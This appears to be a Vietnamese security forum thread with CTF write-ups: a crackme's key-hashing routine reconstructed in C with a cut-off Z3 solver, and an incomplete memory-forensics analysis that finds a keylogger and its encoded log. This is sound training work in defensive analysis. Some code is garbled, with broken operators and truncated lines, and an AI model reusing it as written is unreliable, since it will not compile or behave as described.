// Check if c is a number short sub_436(unsigned char c) { return c = '0'; } // Get distance between c1 and c2 short sub_40D(unsigned char c1, unsigned char c2) { int ret = c1 - c2; return ret >= 0 ? ret : -ret; } // Do one hash round void sub_457(unsigned char* key, unsigned char last, short distance) { for (unsigned char* i = key; *i != 0; ++i) { if (sub_436(*i)) continue; *i += distance; if (*i > 0x5A) *i += 0xE6; } } // Hash the key void sub_4E0(unsigned char* key) { unsigned char last = 0x41; for (unsigned char* i = key; *i != 0; ++i) { if (sub_436(*i)) continue; short distance = sub_40D(last, *i); sub_457(key, last, distance); last = *i; } }

Thus, the crackme is equivalent to the following C program:

Mã:
#include  #include  short is_number(unsigned char c) { return c = '0'; } short get_distance(unsigned char c1, unsigned char c2) { int ret = c1 - c2; return ret >= 0 ? ret : -ret; } void hash_round(unsigned char* key, unsigned char last, short distance) { for (unsigned char* i = key; *i != 0; ++i) { if (is_number(*i)) continue; *i += distance; if (*i > 0x5A) *i += 0xE6; } } void hash_key(unsigned char* key) { unsigned char last = 0x41; for (unsigned char* i = key; *i != 0; ++i) { if (is_number(*i)) continue; short distance = get_distance(last, *i); hash_round(key, last, distance); last = *i; } } int main(void) { unsigned char key[50]; gets(key); hash_key(key); if (!strcmp("3YU8UV86XYZY4W4659756ZUY69582043", key)) puts("Success"); else puts("Fail"); }

Let’s fire up Z3:

Mã:
#! /usr/bin/env python2 from z3 import * def abs(x): return If(x >= 0, x, -x) def adjust(x): return If(x
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
[h=3]Writeup bài Banh it la gai by rawsec

Description[/h] [h=2]Solution[/h]
TL;DR: incomplete write-up.
  • Download the zip.
  • Extract it.
  • We have a raw image.
  • Let’s see what we can do with Volatility:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48

[noraj@rawsec]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2]
$ volatility -f bkav5.raw imageinfo
Volatility Foundation Volatility Framework 2.5
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
AS Layer1 : IA32PagedMemoryPae (Kernel AS)
AS Layer2 : FileAddressSpace (/home/noraj/CTF/WhiteHat_GrandPrix/2016/For2/bkav5.raw)
PAE type : PAE
DTB : 0x334000L
KDBG : 0x8054d2e0L
Number of Processors : 2
Image Type (Service Pack) : 3
KPCR for CPU 0 : 0xffdff000L
KPCR for CPU 1 : 0xfd24c000L
KUSER_SHARED_DATA : 0xffdf0000L
Image date and time : 2016-11-06 16:47:44 UTC+0000
Image local date and time : 2016-11-06 23:47:44 +0700
[noraj@rawsec]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2]
$ volatility -f bkav5.raw --profile=WinXPSP2x86 pstree
Volatility Foundation Volatility Framework 2.5
Name Pid PPid Thds Hnds Time
-------------------------------------------------- ------ ------ ------ ------ ----
0x8107e020:System 4 0 60 228 1970-01-01 00:00:00 UTC+0000
. 0xff596808:smss.exe 544 4 3 17 2016-11-06 16:44:22 UTC+0000
.. 0xff4b4da0:winlogon.exe 644 544 25 524 2016-11-06 16:44:23 UTC+0000
... 0xff609998:services.exe 744 644 13 246 2016-11-06 16:44:25 UTC+0000
.... 0xff4a3d70:vmacthlp.exe 928 744 1 25 2016-11-06 16:44:26 UTC+0000
.... 0xff67a7e8:spoolsv.exe 1600 744 6 54 2016-11-06 16:47:21 UTC+0000
.... 0xff5cfda0:svchost.exe 992 744 10 178 2016-11-06 16:44:27 UTC+0000
.... 0xff583888:svchost.exe 1348 744 6 119 2016-11-06 16:44:27 UTC+0000
.... 0xff59a7b8:svchost.exe 944 744 7 122 2016-11-06 16:44:26 UTC+0000
.... 0x80fdec10:svchost.exe 180 744 5 88 2016-11-06 16:44:45 UTC+0000
.... 0xff481020:svchost.exe 1876 744 15 194 2016-11-06 16:47:07 UTC+0000
.... 0xff58c7b8:svchost.exe 1244 744 5 59 2016-11-06 16:44:27 UTC+0000
... 0xff5be460:lsass.exe 760 644 25 332 2016-11-06 16:44:25 UTC+0000
.. 0xff5974d8:csrss.exe 616 544 10 265 2016-11-06 16:44:22 UTC+0000
0x80ecf928:explorer.exe 1740 1704 17 424 2016-11-06 16:44:32 UTC+0000
. 0xff5bf138:DumpIt.exe 308 1740 1 27 2016-11-06 16:47:42 UTC+0000
. 0x80eb7690:rundll32.exe 1884 1740 4 72 2016-11-06 16:44:37 UTC+0000
. 0xff5b2888:keylog.exe 2020 1740 2 35 2016-11-06 16:47:17 UTC+0000
[noraj@rawsec]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2]
$ volatility -f bkav5.raw --profile=WinXPSP2x86 procdump -p 2020 --dump-dir=.
Volatility Foundation Volatility Framework 2.5
Process(V) ImageBase Name Result
---------- ---------- -------------------- ------
0xff5b2888 0x00400000 keylog.exe OK: executable.2020.exe
  • See a supicious keylog.exe so we dumped it.
  • Upload it to Virustotal and to Hybrid Analysis.
  • Detection ratio: 4 / 56, a keylogger.
  • Just look for quick win:

1
2
3
4
5
6
7
8
9

[noraj@rawsec]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2]
$ strings keylog.exe_executable.2020.exe
[...]
%c - %d
c:/windows/keylog.log
[WIN]
[...]
  • The malware is saving its collected informations in c:/windows/keylog.log.
  • Let’s find the file and dump it:

1
2
3
4
5
6
7
8
9
10
11
12

[noraj@rawsec]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2]
$ volatility -f bkav5.raw --profile=WinXPSP2x86 filescan | grep -i 'keylog.log'
Volatility Foundation Volatility Framework 2.5
Offset(P) #Ptr #Hnd Access Name
------------------ ------ ------ ------ ----
0x00000000010410a0 1 0 RW-rw- \Device\HarddiskVolume1\WINDOWS\keylog.log
[noraj@rawsec]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2]
$ volatility -f bkav5.raw --profile=WinXPSP2x86 dumpfiles -Q 0x00000000010410a0 --dump-dir=.
Volatility Foundation Volatility Framework 2.5
DataSectionObject 0x010410a0 None \Device\HarddiskVolume1\WINDOWS\keylog.log
  • But this is a non standard encoding:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

[noraj@rawsec]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2]
$ file keylog.log_file.None.0x80eb7008.dat
keylog.log_file.None.0x80eb7008.dat: Non-ISO extended-ASCII text, with NEL line terminators
[noraj@rawsec]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2]
$ xxd keylog.log_file.None.0x80eb7008.dat
00000000: 8589 9790 83bd b3ba 859b b0aa bbac 83b6 ................
00000010: bbb2 b2b1 859b b0aa bbac 83a9 bbb2 b2b1 ................
00000020: 859c 9f9d 958d 8e9f 9d9b 83bd b1b3 bbfe ................
00000030: a7b1 abfe b9ab a7ff 859c 9f9d 958d 8e9f ................
00000040: 9d9b 83fe e185 9bb0 aabb ac83 a9bb b2fe ................
00000050: b1ac fea9 bbb2 b2fe e185 9bb0 aabb ac83 ................
00000060: a9b6 bfaa bbac a8bb acfe 869a 859b b0aa ................
00000070: bbac 8385 8997 9083 bdb6 acb1 b3bb 859b ................
00000080: b0aa bbac 83a9 bbb2 feb1 ac85 9c9f 9d95 ................
00000090: 8d8e 9f9d 9b83 859c 9f9d 958d 8e9f 9d9b ................
000000a0: 8385 9c9f 9d95 8d8e 9f9d 9b83 b2bd b1b3 ................
000000b0: bbfe b1ac fea9 bbb2 bdb1 b3bb 859b b0aa ................
000000c0: bbac 83ab b6b3 fef0 f0f0 fe85 9c9f 9d95 ................
000000d0: 8d8e 9f9d 9b83 859c 9f9d 958d 8e9f 9d9b ................
000000e0: 8385 9c9f 9d95 8d8e 9f9d 9b83 859c 9f9d ................
000000f0: 958d 8e9f 9d9b 8385 9c9f 9d95 8d8e 9f9d ................
00000100: 9b83 859c 9f9d 958d 8e9f 9d9b 8385 9c9f ................
00000110: 9d95 8d8e 9f9d 9b83 859c 9f9d 958d 8e9f ................
00000120: 9d9b 8385 9c9f 9d95 8d8e 9f9d 9b83 859c ................
00000130: 9f9d 958d 8e9f 9d9b 8385 9c9f 9d95 8d8e ................
00000140: 9f9d 9b83 859c 9f9d 958d 8e9f 9d9b 8385 ................
00000150: 9c9f 9d95 8d8e 9f9d 9b83 b7fe b9b1 aafe ................
00000160: b7aa fef0 feaa b6bf aafe a9bb b2bd b1b3 ................
00000170: bbfe e49a 859d aaac b283 aab8 bf85 9bb0 ................
00000180: aabb ac83 859d aaac b283 aab8 bdbb b1b1 ................
00000190: b5f0 bdb1 b385 9bb0 aabb ac83 aab6 b7ad ................
000001a0: b7ad b3a7 b8b2 bfb9 d7a5 a385 92bb b8aa ................
000001b0: 9fac acb1 a983 b5ba b7bb b5b5 bab7 eced ................
000001c0: e7ed e9ba b8b6 ede7 b4ad b2ad bab5 e7ed ................
000001d0: 859b b0aa bbac 83aa b6bf b0b5 a7b1 abff ................
000001e0: 859b b0aa bbac 83e4 9abf bcbd babb b8b9 ................
000001f0: b6b7 b5b2 b3b0 b1ae afac adaa e1e1 e1a7 ................
  • This is nor UTF-8, nor WINDOWS-1252/C1252.
  • Try to determine what kind of encoding this is (source: superuser.com):

1
2
3
4
5
6

$ iconv --list | sed 's/\/\/$//' | sort > encodings.list
$ for a in `cat encodings.list`; do
printf "$a "
iconv -f $a -t UTF-8 keylog.log_file.None.0x80eb7008.dat > /dev/null 2>&1 \
&& echo "ok: $a" || echo "fail: $a"
done | tee result.txt
  • Let’s take a look at results:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494

1026 ok: 1026
1047 ok: 1047
437 ok: 437
500 ok: 500
500V1 ok: 500V1
850 ok: 850
851 ok: 851
852 ok: 852
855 ok: 855
860 ok: 860
861 ok: 861
862 ok: 862
863 ok: 863
865 ok: 865
866 ok: 866
866NAV ok: 866NAV
8859_1 ok: 8859_1
8859_2 ok: 8859_2
8859_4 ok: 8859_4
8859_5 ok: 8859_5
8859_9 ok: 8859_9
BALTIC ok: BALTIC
CP037 ok: CP037
CP10007 ok: CP10007
CP1025 ok: CP1025
CP1026 ok: CP1026
CP1047 ok: CP1047
CP1070 ok: CP1070
CP1079 ok: CP1079
CP1081 ok: CP1081
CP1084 ok: CP1084
CP1097 ok: CP1097
CP1112 ok: CP1112
CP1122 ok: CP1122
CP1123 ok: CP1123
CP1124 ok: CP1124
CP1125 ok: CP1125
CP1129 ok: CP1129
CP1130 ok: CP1130
CP1137 ok: CP1137
CP1140 ok: CP1140
CP1141 ok: CP1141
CP1142 ok: CP1142
CP1143 ok: CP1143
CP1144 ok: CP1144
CP1145 ok: CP1145
CP1146 ok: CP1146
CP1147 ok: CP1147
CP1148 ok: CP1148
CP1149 ok: CP1149
CP1153 ok: CP1153
CP1154 ok: CP1154
CP1155 ok: CP1155
CP1156 ok: CP1156
CP1157 ok: CP1157
CP1158 ok: CP1158
CP1160 ok: CP1160
CP1163 ok: CP1163
CP1164 ok: CP1164
CP1166 ok: CP1166
CP1167 ok: CP1167
CP1251 ok: CP1251
CP1256 ok: CP1256
CP1282 ok: CP1282
CP1390 ok: CP1390
CP1399 ok: CP1399
CP273 ok: CP273
CP278 ok: CP278
CP280 ok: CP280
CP282 ok: CP282
CP284 ok: CP284
CP285 ok: CP285
CP297 ok: CP297
CP437 ok: CP437
CP500 ok: CP500
CP5347 ok: CP5347
CP737 ok: CP737
CP770 ok: CP770
CP771 ok: CP771
CP772 ok: CP772
CP773 ok: CP773
CP774 ok: CP774
CP775 ok: CP775
CP819 ok: CP819
CP850 ok: CP850
CP851 ok: CP851
CP852 ok: CP852
CP855 ok: CP855
CP860 ok: CP860
CP861 ok: CP861
CP862 ok: CP862
CP863 ok: CP863
CP865 ok: CP865
CP866 ok: CP866
CP866NAV ok: CP866NAV
CP870 ok: CP870
CP871 ok: CP871
CP880 ok: CP880
CP901 ok: CP901
CP902 ok: CP902
CP9030 ok: CP9030
CP912 ok: CP912
CP915 ok: CP915
CP920 ok: CP920
CP921 ok: CP921
CP922 ok: CP922
CP9448 ok: CP9448
CP-HU ok: CP-HU
CPIBM861 ok: CPIBM861
CSIBM037 ok: CSIBM037
CSIBM1025 ok: CSIBM1025
CSIBM1026 ok: CSIBM1026
CSIBM1097 ok: CSIBM1097
CSIBM1112 ok: CSIBM1112
CSIBM1122 ok: CSIBM1122
CSIBM1123 ok: CSIBM1123
CSIBM1124 ok: CSIBM1124
CSIBM1129 ok: CSIBM1129
CSIBM1130 ok: CSIBM1130
CSIBM1137 ok: CSIBM1137
CSIBM1140 ok: CSIBM1140
CSIBM1141 ok: CSIBM1141
CSIBM1142 ok: CSIBM1142
CSIBM1143 ok: CSIBM1143
CSIBM1144 ok: CSIBM1144
CSIBM1145 ok: CSIBM1145
CSIBM1146 ok: CSIBM1146
CSIBM1147 ok: CSIBM1147
CSIBM1148 ok: CSIBM1148
CSIBM1149 ok: CSIBM1149
CSIBM1153 ok: CSIBM1153
CSIBM1154 ok: CSIBM1154
CSIBM1155 ok: CSIBM1155
CSIBM1156 ok: CSIBM1156
CSIBM1157 ok: CSIBM1157
CSIBM1158 ok: CSIBM1158
CSIBM1160 ok: CSIBM1160
CSIBM1163 ok: CSIBM1163
CSIBM1164 ok: CSIBM1164
CSIBM1166 ok: CSIBM1166
CSIBM1167 ok: CSIBM1167
CSIBM1390 ok: CSIBM1390
CSIBM1399 ok: CSIBM1399
CSIBM273 ok: CSIBM273
CSIBM277 ok: CSIBM277
CSIBM278 ok: CSIBM278
CSIBM280 ok: CSIBM280
CSIBM284 ok: CSIBM284
CSIBM285 ok: CSIBM285
CSIBM297 ok: CSIBM297
CSIBM500 ok: CSIBM500
CSIBM5347 ok: CSIBM5347
CSIBM851 ok: CSIBM851
CSIBM855 ok: CSIBM855
CSIBM860 ok: CSIBM860
CSIBM863 ok: CSIBM863
CSIBM865 ok: CSIBM865
CSIBM866 ok: CSIBM866
CSIBM870 ok: CSIBM870
CSIBM871 ok: CSIBM871
CSIBM880 ok: CSIBM880
CSIBM901 ok: CSIBM901
CSIBM902 ok: CSIBM902
CSIBM9030 ok: CSIBM9030
CSIBM921 ok: CSIBM921
CSIBM922 ok: CSIBM922
CSIBM9448 ok: CSIBM9448
CSISO111ECMACYRILLIC ok: CSISO111ECMACYRILLIC
CSISO139CSN369103 ok: CSISO139CSN369103
CSISO143IECP271 ok: CSISO143IECP271
CSISOLATIN1 ok: CSISOLATIN1
CSISOLATIN2 ok: CSISOLATIN2
CSISOLATIN4 ok: CSISOLATIN4
CSISOLATIN5 ok: CSISOLATIN5
CSISOLATIN6 ok: CSISOLATIN6
CSISOLATINCYRILLIC ok: CSISOLATINCYRILLIC
CSKOI8R ok: CSKOI8R
CSMACINTOSH ok: CSMACINTOSH
CSN_369103 ok: CSN_369103
CSPC775BALTIC ok: CSPC775BALTIC
CSPC850MULTILINGUAL ok: CSPC850MULTILINGUAL
CSPC862LATINHEBREW ok: CSPC862LATINHEBREW
CSPC8CODEPAGE437 ok: CSPC8CODEPAGE437
CSPCP852 ok: CSPCP852
CSUNICODE ok: CSUNICODE
CWI ok: CWI
CWI-2 ok: CWI-2
CYRILLIC ok: CYRILLIC
EBCDIC-CP-BE ok: EBCDIC-CP-BE
EBCDIC-CP-CA ok: EBCDIC-CP-CA
EBCDIC-CP-CH ok: EBCDIC-CP-CH
EBCDIC-CP-DK ok: EBCDIC-CP-DK
EBCDIC-CP-ES ok: EBCDIC-CP-ES
EBCDIC-CP-FI ok: EBCDIC-CP-FI
EBCDIC-CP-FR ok: EBCDIC-CP-FR
EBCDIC-CP-GB ok: EBCDIC-CP-GB
EBCDIC-CP-IS ok: EBCDIC-CP-IS
EBCDIC-CP-IT ok: EBCDIC-CP-IT
EBCDIC-CP-NL ok: EBCDIC-CP-NL
EBCDIC-CP-NO ok: EBCDIC-CP-NO
EBCDIC-CP-ROECE ok: EBCDIC-CP-ROECE
EBCDIC-CP-SE ok: EBCDIC-CP-SE
EBCDIC-CP-US ok: EBCDIC-CP-US
EBCDIC-CP-WT ok: EBCDIC-CP-WT
EBCDIC-CP-YU ok: EBCDIC-CP-YU
EBCDIC-CYRILLIC ok: EBCDIC-CYRILLIC
EBCDIC-INT1 ok: EBCDIC-INT1
ECMA-128 ok: ECMA-128
ECMACYRILLIC ok: ECMACYRILLIC
ECMA-CYRILLIC ok: ECMA-CYRILLIC
GEORGIAN-ACADEMY ok: GEORGIAN-ACADEMY
GEORGIAN-PS ok: GEORGIAN-PS
IBM037 ok: IBM037
IBM1025 ok: IBM1025
IBM-1025 ok: IBM-1025
IBM1026 ok: IBM1026
IBM1047 ok: IBM1047
IBM-1047 ok: IBM-1047
IBM1097 ok: IBM1097
IBM-1097 ok: IBM-1097
IBM1112 ok: IBM1112
IBM-1112 ok: IBM-1112
IBM1122 ok: IBM1122
IBM-1122 ok: IBM-1122
IBM1123 ok: IBM1123
IBM-1123 ok: IBM-1123
IBM1124 ok: IBM1124
IBM-1124 ok: IBM-1124
IBM1129 ok: IBM1129
IBM-1129 ok: IBM-1129
IBM1130 ok: IBM1130
IBM-1130 ok: IBM-1130
IBM1137 ok: IBM1137
IBM-1137 ok: IBM-1137
IBM1140 ok: IBM1140
IBM-1140 ok: IBM-1140
IBM1141 ok: IBM1141
IBM-1141 ok: IBM-1141
IBM1142 ok: IBM1142
IBM-1142 ok: IBM-1142
IBM1143 ok: IBM1143
IBM-1143 ok: IBM-1143
IBM1144 ok: IBM1144
IBM-1144 ok: IBM-1144
IBM1145 ok: IBM1145
IBM-1145 ok: IBM-1145
IBM1146 ok: IBM1146
IBM-1146 ok: IBM-1146
IBM1147 ok: IBM1147
IBM-1147 ok: IBM-1147
IBM1148 ok: IBM1148
IBM-1148 ok: IBM-1148
IBM1149 ok: IBM1149
IBM-1149 ok: IBM-1149
IBM1153 ok: IBM1153
IBM-1153 ok: IBM-1153
IBM1154 ok: IBM1154
IBM-1154 ok: IBM-1154
IBM1155 ok: IBM1155
IBM-1155 ok: IBM-1155
IBM1156 ok: IBM1156
IBM-1156 ok: IBM-1156
IBM1157 ok: IBM1157
IBM-1157 ok: IBM-1157
IBM1158 ok: IBM1158
IBM-1158 ok: IBM-1158
IBM1160 ok: IBM1160
IBM-1160 ok: IBM-1160
IBM1163 ok: IBM1163
IBM-1163 ok: IBM-1163
IBM1164 ok: IBM1164
IBM-1164 ok: IBM-1164
IBM1166 ok: IBM1166
IBM-1166 ok: IBM-1166
IBM1167 ok: IBM1167
IBM-1167 ok: IBM-1167
IBM1390 ok: IBM1390
IBM-1390 ok: IBM-1390
IBM1399 ok: IBM1399
IBM-1399 ok: IBM-1399
IBM256 ok: IBM256
IBM273 ok: IBM273
IBM277 ok: IBM277
IBM278 ok: IBM278
IBM280 ok: IBM280
IBM284 ok: IBM284
IBM285 ok: IBM285
IBM297 ok: IBM297
IBM437 ok: IBM437
IBM500 ok: IBM500
IBM5347 ok: IBM5347
IBM-5347 ok: IBM-5347
IBM775 ok: IBM775
IBM819 ok: IBM819
IBM848 ok: IBM848
IBM850 ok: IBM850
IBM851 ok: IBM851
IBM852 ok: IBM852
IBM855 ok: IBM855
IBM860 ok: IBM860
IBM861 ok: IBM861
IBM862 ok: IBM862
IBM863 ok: IBM863
IBM865 ok: IBM865
IBM866 ok: IBM866
IBM866NAV ok: IBM866NAV
IBM870 ok: IBM870
IBM871 ok: IBM871
IBM880 ok: IBM880
IBM901 ok: IBM901
IBM-901 ok: IBM-901
IBM902 ok: IBM902
IBM-902 ok: IBM-902
IBM9030 ok: IBM9030
IBM-9030 ok: IBM-9030
IBM912 ok: IBM912
IBM915 ok: IBM915
IBM920 ok: IBM920
IBM921 ok: IBM921
IBM-921 ok: IBM-921
IBM922 ok: IBM922
IBM-922 ok: IBM-922
IBM9448 ok: IBM9448
IBM-9448 ok: IBM-9448
IEC_P271 ok: IEC_P271
IEC_P27-1 ok: IEC_P27-1
ISO-10646/UCS2/ ok: ISO-10646/UCS2/
ISO_11548-1 ok: ISO_11548-1
ISO11548-1 ok: ISO11548-1
ISO6937 ok: ISO6937
ISO_6937 ok: ISO_6937
ISO_6937:1992 ok: ISO_6937:1992
ISO88591 ok: ISO88591
ISO_8859-1 ok: ISO_8859-1
ISO-8859-1 ok: ISO-8859-1
ISO8859-1 ok: ISO8859-1
ISO885910 ok: ISO885910
ISO_8859-10 ok: ISO_8859-10
ISO-8859-10 ok: ISO-8859-10
ISO8859-10 ok: ISO8859-10
ISO_8859-10:1992 ok: ISO_8859-10:1992
ISO_8859-1:1987 ok: ISO_8859-1:1987
ISO885913 ok: ISO885913
ISO-8859-13 ok: ISO-8859-13
ISO8859-13 ok: ISO8859-13
ISO885914 ok: ISO885914
ISO_8859-14 ok: ISO_8859-14
ISO-8859-14 ok: ISO-8859-14
ISO8859-14 ok: ISO8859-14
ISO_8859-14:1998 ok: ISO_8859-14:1998
ISO885915 ok: ISO885915
ISO_8859-15 ok: ISO_8859-15
ISO-8859-15 ok: ISO-8859-15
ISO8859-15 ok: ISO8859-15
ISO_8859-15:1998 ok: ISO_8859-15:1998
ISO885916 ok: ISO885916
ISO_8859-16 ok: ISO_8859-16
ISO-8859-16 ok: ISO-8859-16
ISO8859-16 ok: ISO8859-16
ISO_8859-16:2001 ok: ISO_8859-16:2001
ISO88592 ok: ISO88592
ISO_8859-2 ok: ISO_8859-2
ISO-8859-2 ok: ISO-8859-2
ISO8859-2 ok: ISO8859-2
ISO_8859-2:1987 ok: ISO_8859-2:1987
ISO88594 ok: ISO88594
ISO_8859-4 ok: ISO_8859-4
ISO-8859-4 ok: ISO-8859-4
ISO8859-4 ok: ISO8859-4
ISO_8859-4:1988 ok: ISO_8859-4:1988
ISO88595 ok: ISO88595
ISO_8859-5 ok: ISO_8859-5
ISO-8859-5 ok: ISO-8859-5
ISO8859-5 ok: ISO8859-5
ISO_8859-5:1988 ok: ISO_8859-5:1988
ISO88599 ok: ISO88599
ISO_8859-9 ok: ISO_8859-9
ISO-8859-9 ok: ISO-8859-9
ISO8859-9 ok: ISO8859-9
ISO_8859-9:1989 ok: ISO_8859-9:1989
ISO88599E ok: ISO88599E
ISO_8859-9E ok: ISO_8859-9E
ISO-8859-9E ok: ISO-8859-9E
ISO8859-9E ok: ISO8859-9E
ISO-CELTIC ok: ISO-CELTIC
ISO-IR-100 ok: ISO-IR-100
ISO-IR-101 ok: ISO-IR-101
ISO-IR-110 ok: ISO-IR-110
ISO-IR-111 ok: ISO-IR-111
ISO-IR-139 ok: ISO-IR-139
ISO-IR-143 ok: ISO-IR-143
ISO-IR-144 ok: ISO-IR-144
ISO-IR-148 ok: ISO-IR-148
ISO-IR-156 ok: ISO-IR-156
ISO-IR-157 ok: ISO-IR-157
ISO-IR-179 ok: ISO-IR-179
ISO-IR-199 ok: ISO-IR-199
ISO-IR-203 ok: ISO-IR-203
ISO-IR-226 ok: ISO-IR-226
ISO/TR_11548-1/ ok: ISO/TR_11548-1/
KOI8R ok: KOI8R
KOI8-R ok: KOI8-R
KOI8-RU ok: KOI8-RU
KOI8U ok: KOI8U
KOI8-U ok: KOI8-U
L1 ok: L1
L10 ok: L10
L2 ok: L2
L4 ok: L4
L5 ok: L5
L6 ok: L6
L7 ok: L7
L8 ok: L8
LATIN1 ok: LATIN1
LATIN10 ok: LATIN10
LATIN2 ok: LATIN2
LATIN4 ok: LATIN4
LATIN5 ok: LATIN5
LATIN6 ok: LATIN6
LATIN7 ok: LATIN7
LATIN8 ok: LATIN8
LATIN9 ok: LATIN9
LATIN-9 ok: LATIN-9
MAC ok: MAC
MAC-CENTRALEUROPE ok: MAC-CENTRALEUROPE
MACCYRILLIC ok: MACCYRILLIC
MAC-CYRILLIC ok: MAC-CYRILLIC
MACINTOSH ok: MACINTOSH
MACIS ok: MACIS
MAC-IS ok: MAC-IS
MAC-SAMI ok: MAC-SAMI
MACUK ok: MACUK
MAC-UK ok: MAC-UK
MACUKRAINIAN ok: MACUKRAINIAN
MIK ok: MIK
MS-ARAB ok: MS-ARAB
MS-CYRL ok: MS-CYRL
MSMACCYRILLIC ok: MSMACCYRILLIC
MS-MAC-CYRILLIC ok: MS-MAC-CYRILLIC
OSF00010001 ok: OSF00010001
OSF00010002 ok: OSF00010002
OSF00010004 ok: OSF00010004
OSF00010005 ok: OSF00010005
OSF00010009 ok: OSF00010009
OSF0001000A ok: OSF0001000A
OSF00010100 ok: OSF00010100
OSF00010101 ok: OSF00010101
OSF00010102 ok: OSF00010102
OSF10020025 ok: OSF10020025
OSF10020111 ok: OSF10020111
OSF10020115 ok: OSF10020115
OSF10020116 ok: OSF10020116
OSF10020118 ok: OSF10020118
OSF1002011C ok: OSF1002011C
OSF1002011D ok: OSF1002011D
OSF10020129 ok: OSF10020129
OSF100201B5 ok: OSF100201B5
OSF100201F4 ok: OSF100201F4
OSF10020352 ok: OSF10020352
OSF10020354 ok: OSF10020354
OSF10020357 ok: OSF10020357
OSF1002035D ok: OSF1002035D
OSF1002035E ok: OSF1002035E
OSF1002035F ok: OSF1002035F
OSF10020366 ok: OSF10020366
OSF10020367 ok: OSF10020367
OSF10020370 ok: OSF10020370
OSF10020402 ok: OSF10020402
OSF10020417 ok: OSF10020417
PT154 ok: PT154
RK1048 ok: RK1048
RUSCII ok: RUSCII
STRK1048-2002 ok: STRK1048-2002
TCVN ok: TCVN
TCVN-5712 ok: TCVN-5712
TCVN5712-1 ok: TCVN5712-1
TCVN5712-1:1993 ok: TCVN5712-1:1993
TS-5881 ok: TS-5881
UCS2 ok: UCS2
UCS-2 ok: UCS-2
UCS-2BE ok: UCS-2BE
UCS-2LE ok: UCS-2LE
UNICODE ok: UNICODE
UNICODEBIG ok: UNICODEBIG
UNICODELITTLE ok: UNICODELITTLE
UTF16 ok: UTF16
UTF-16 ok: UTF-16
UTF16BE ok: UTF16BE
UTF-16BE ok: UTF-16BE
UTF16LE ok: UTF16LE
UTF-16LE ok: UTF-16LE
VISCII ok: VISCII
WINDOWS-1251 ok: WINDOWS-1251
WINDOWS-1256 ok: WINDOWS-1256
  • Tried UTF-16, UNICODELITTLE, UNICODE, LATIN1, ISO-8859-1 WINDOWS-1251, CP1251 with iconv.
  • Tried enca recognition:

    1
    2
    3
    4
    5
    6

    [noraj@rawsec]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2]
    $ enca -f keylog.log_file.None.0x80eb7008.dat
    enca: Cannot determine (or understand) your language preferences.
    Please use `-L language', or `-L none' if your language is not supported
    (only a few multibyte encodings can be recognized then).
    Run `enca --list languages' to get a list of supported languages.
  • Tried chardet (not even a relevent output):

1
2
3

[noraj@rawsec]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2]
$ chardetect keylog.log_file.None.0x80eb7008.dat
keylog.log_file.None.0x80eb7008.dat: windows-1253 with confidence 0.3253156807138245
[h=2]Submit[/h]
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bên trên